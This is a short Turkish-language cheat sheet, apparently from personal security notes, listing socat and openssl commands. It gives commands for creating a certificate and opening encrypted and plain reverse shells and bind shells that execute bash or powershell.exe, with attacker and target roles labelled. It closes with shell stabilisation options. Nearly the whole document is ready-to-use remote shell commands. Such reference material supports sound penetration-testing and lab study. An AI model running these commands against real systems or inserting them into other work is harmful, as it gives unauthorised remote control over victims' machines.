---
title: socat
date: 2022-11-27T09:00:00Z
draft: false
type: note
author: Kaptan
category: Cyber Security
subcategory: Commands
tags:
  - commands
  - tools
---

Anahtarın Şifrelenmesi:

```zsh
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
```

Bağlantının Oluşturulması (Hedef):

```zsh
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash
```

Bağlantının Oluşturulması (Saldırgan):

```zsh
socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -
```

Anahtar ile Şifrenin Çözülmesi:

```zsh
openssl rsautl -decrypt -inkey <private-key> -in <encrypted-file> -out <decrypted-file>
```

Socat ve OpenSSL ile (key-cert) ile Bağlantı:

```zsh
socat stdio \
    openssl-connect:[IP]:[PORT],openssl-commonname=socatssl,cert=cert,key=key,verify=0
```

Socat ile Reverse Shell:

```zsh
socat TCP-L:<port> -
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"
```

Socat ile Bind Shell:

```zsh
socat TCP-L:<PORT> EXEC:"bash -li"
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
socat TCP:<TARGET-IP>:<TARGET-PORT> -
```

**Ek Notlar:**  

- pty, allocates a pseudoterminal on the target -- part of the stabilisation process
- stderr, makes sure that any error messages get shown in the shell (often a problem with non-interactive shells)
- sigint, passes any Ctrl + C commands through into the sub-process, allowing us to kill commands inside the shell
- setsid, creates the process in a new session
- sane, stabilises the terminal, attempting to "normalise" it.
